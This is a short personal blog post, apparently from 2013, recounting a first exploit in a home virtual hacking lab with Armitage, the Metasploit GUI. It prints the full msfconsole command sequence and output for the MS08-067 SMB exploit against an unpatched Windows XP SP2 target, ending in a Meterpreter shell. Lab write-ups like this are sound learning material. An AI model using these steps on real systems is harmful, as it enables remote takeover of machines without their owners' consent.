I just completed my first successful exploit in the marvellous Metasploit GUI Armitage.
Details of the target machine on my Virtual Hacking Lab:
Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.
First up, I added the “Host” which is the target IP address.
Then right clicked the “Host” and performed the scan, which is a bundle of inbuilt Metasploit scans (ftp, smtp, http, smb_versions), each gleaning information on the target.
Note the “Host” terminal image now bears the Windows logo as the detected operating system during the scan.
Then up to the toolbar Attacks >> Find attacks.
Once complete we can right-click the “Host” and select “Attack” which gives us a list of potential exploits.
At this point I cheated as my very first command prompt Metasploit exploit on this target machine was via “exploit/windows/smb/ms08_067_netapi” so I simply selected this from “smb” in the dropdown list.
But first I checked the exploit:
So I launched the attack and within a few seconds the “Host” terminal image changed:
The red terminal with electrical jolts indicates a compromised target.
Here’s the Output of the process:
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set LPORT 20855
LPORT => 20855
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:57239 -> 192.168.1.79:20855) at 2013-09-02 18:27:27 +0100meterpreter >
As you can see I have obtained an Meterpreter shell.
Right-clicking on the “Host” image now gives me “Meterpreter” in the dropdown with every conceivable option available at the click of a finger.
Metasploit Armitage is a fabulous tool.
Next time I’ll look to compromise an Ubuntu system that I’ve never exploited before.